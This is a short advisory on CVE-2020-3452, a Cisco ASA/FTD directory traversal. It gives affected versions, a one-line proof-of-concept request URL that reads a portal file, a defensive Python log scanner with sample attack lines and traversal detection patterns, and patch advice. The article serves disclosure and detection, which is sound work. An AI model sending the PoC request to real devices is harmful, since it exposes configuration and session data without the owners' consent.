Warning
Do not use the content of this article to violate the law.
This article comes with no guarantee of any kind.
1. Vulnerability description
Cisco has officially released an advisory for a directory traversal vulnerability in the web interface of Cisco ASA and FTD software that allows arbitrary file reading; it is tracked as CVE-2020-3452. An attacker can only read files inside the web directory and cannot reach files outside it through this vulnerability. It can expose WebVPN configuration information, cookies, and similar data.
Vulnerability level: Medium severity.
2. Affected versions
- Cisco ASA: <= 9.6
- Cisco ASA: 9.7, 9.8, 9.9, 9.10, 9.12, 9.13, 9.14
- Cisco FTD: 6.2.2, 6.2.3, 6.3.0, 6.4.0, 6.5.0, 6.6.0
3. Vulnerability reproduction
The PoC is as follows:
https://x.x.x.x/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
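As an added defensive example (not part of the original notice, nor Cisco's own tooling), the following Python script scans web-server or proxy access-log lines for requests that match the translation-table path of the PoC above, decoding percent-encoded values first so that single- and double-encoded variants of the traversal are caught as well. The log lines are constructed samples in a combined-log-like format; the request-line regex is an assumption about that format.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic); the last two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Jul/2020:10:01:02 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 5120
10.0.0.6 - - [22/Jul/2020:10:02:03 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=%2FCSCOE%2B%2Fportal_inc.lua&lang=%2e%2e%2f HTTP/1.1" 200 4096
10.0.0.7 - - [22/Jul/2020:10:03:04 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 2048
10.0.0.8 - - [22/Jul/2020:10:04:05 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=AnyConnect&default-language&lang=en HTTP/1.1" 200 1024
"""

# Assumed request-line layout: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# A ".." path segment anywhere in a parameter value
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so %2e%2e%2f and %252e%252e%252f both become ../."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def is_cve_2020_3452_probe(target):
    """True if a request target looks like the translation-table traversal."""
    parts = urlsplit(target)
    if decode_fully(parts.path).rstrip("/") != "/+CSCOT+/translation-table":
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    for key in ("lang", "textdomain"):
        for raw in params.get(key, []):
            if TRAVERSAL.search(decode_fully(raw)):
                return True
    return False

def scan_log(text):
    """Return (client_ip, target) for each suspicious line in the log text."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_cve_2020_3452_probe(m.group("target")):
            hits.append((line.split()[0], m.group("target")))
    return hits

if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"possible CVE-2020-3452 probe from {ip}: {target}")
```

A hit only indicates a probe attempt; correlate with the response size and status to judge whether the device actually served the requested file.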
4. Vulnerability fix
Install the latest Cisco ASA/FTD patch and perform the upgrade.